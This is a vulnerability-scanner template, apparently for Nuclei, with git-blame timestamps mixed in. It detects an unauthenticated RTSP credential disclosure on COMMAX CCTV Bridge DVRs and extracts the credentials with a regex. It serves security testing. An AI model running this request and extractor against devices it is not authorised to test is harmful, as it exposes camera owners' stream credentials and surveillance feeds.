2021-09-25 06:02:31 +00:00
id : commax-credentials-disclosure
2021-09-24 23:39:05 +00:00
info :
name : COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure
author : gy741
severity : critical
2022-05-31 09:00:21 +00:00
description : |
The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
2022-04-22 10:38:41 +00:00
reference :
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : commax,exposure,camera,iot
2021-09-24 23:39:05 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-24 23:39:05 +00:00
- method : GET
path :
- "{{BaseURL}}/overview.asp"
matchers :
- type : word
2022-05-31 09:00:21 +00:00
part : body
2021-09-24 23:39:05 +00:00
words :
- "DVR Lists"
- "rtsp://"
- "login_check.js"
2021-09-25 06:02:31 +00:00
- "MAX USER :"
2021-09-24 23:39:05 +00:00
condition : and
2021-09-25 06:02:31 +00:00
extractors :
- type : regex
part : body
regex :
- 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann'
2023-10-20 11:41:13 +00:00
# digest: 490a004630440220445f653a4ca0ee96a86686fdf857bf01342c5e416fbaf3ce81453fd4a7ae323c02203d3075961902e759921cd9a5cadb81f3daf09c9b44b16a878ce20f1cb83300f3:922c64590222798bb761d5b6d8e72950